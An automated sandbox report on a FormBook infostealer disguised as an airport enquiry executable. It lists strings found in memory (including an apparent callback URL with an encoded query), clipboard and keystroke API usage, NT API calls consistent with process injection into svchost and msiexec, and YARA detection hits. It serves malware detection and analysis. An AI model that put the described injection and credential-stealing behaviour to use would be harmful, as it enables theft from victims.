          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000002.00000002.4135304707.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000000.1694928784.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140282960.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: explorer.exe, 00000002.00000002.4144395601.000000001130F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.4132018408.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.theselflovesite.com/pt46/?ara=RFlzK8LCC7FuO7cJ0ecz1aHzXPpVQPZoCqNi80z/o3n5SIq8wUQ5l6Qg5p
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CF425A
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CF4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00CF4458
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CF425A
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00CE0219
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00D0CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00D0CDAC

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.4143107748.000000000E6AA000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: New Al Maktoum International Airport Enquiry Ref #2401249.exe PID: 7428, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7456, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: msiexec.exe PID: 7504, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Binary is likely a compiled AutoIt script file
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: This is a third-party compiled AutoIt script.0_2_00C83B4C
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_221534b7-f
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f32cfdd0-5
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bbc5067e-4
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_fb4fb756-1
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: New Al Maktoum International Airport Enquiry Ref #2401249.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B60 NtClose,LdrInitializeThunk,1_2_03072B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BF0 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_03072BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AD0 NtReadFile,LdrInitializeThunk,1_2_03072AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F30 NtCreateSection,LdrInitializeThunk,1_2_03072F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F90 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03072F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FB0 NtResumeThread,LdrInitializeThunk,1_2_03072FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FE0 NtCreateFile,LdrInitializeThunk,1_2_03072FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072E80 NtReadVirtualMemory,LdrInitializeThunk,1_2_03072E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_03072EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D10 NtMapViewOfSection,LdrInitializeThunk,1_2_03072D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D30 NtUnmapViewOfSection,LdrInitializeThunk,1_2_03072D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DD0 NtDelayExecution,LdrInitializeThunk,1_2_03072DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03072DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CA0 NtQueryInformationToken,LdrInitializeThunk,1_2_03072CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074340 NtSetContextThread,1_2_03074340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074650 NtSuspendThread,1_2_03074650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B80 NtQueryInformationFile,1_2_03072B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BA0 NtEnumerateValueKey,1_2_03072BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BE0 NtQueryValueKey,1_2_03072BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AB0 NtWaitForSingleObject,1_2_03072AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AF0 NtWriteFile,1_2_03072AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F60 NtCreateProcessEx,1_2_03072F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FA0 NtQuerySection,1_2_03072FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072E30 NtWriteVirtualMemory,1_2_03072E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072EE0 NtQueueApcThread,1_2_03072EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D00 NtSetInformationFile,1_2_03072D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DB0 NtEnumerateKey,1_2_03072DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C00 NtQueryInformationProcess,1_2_03072C00
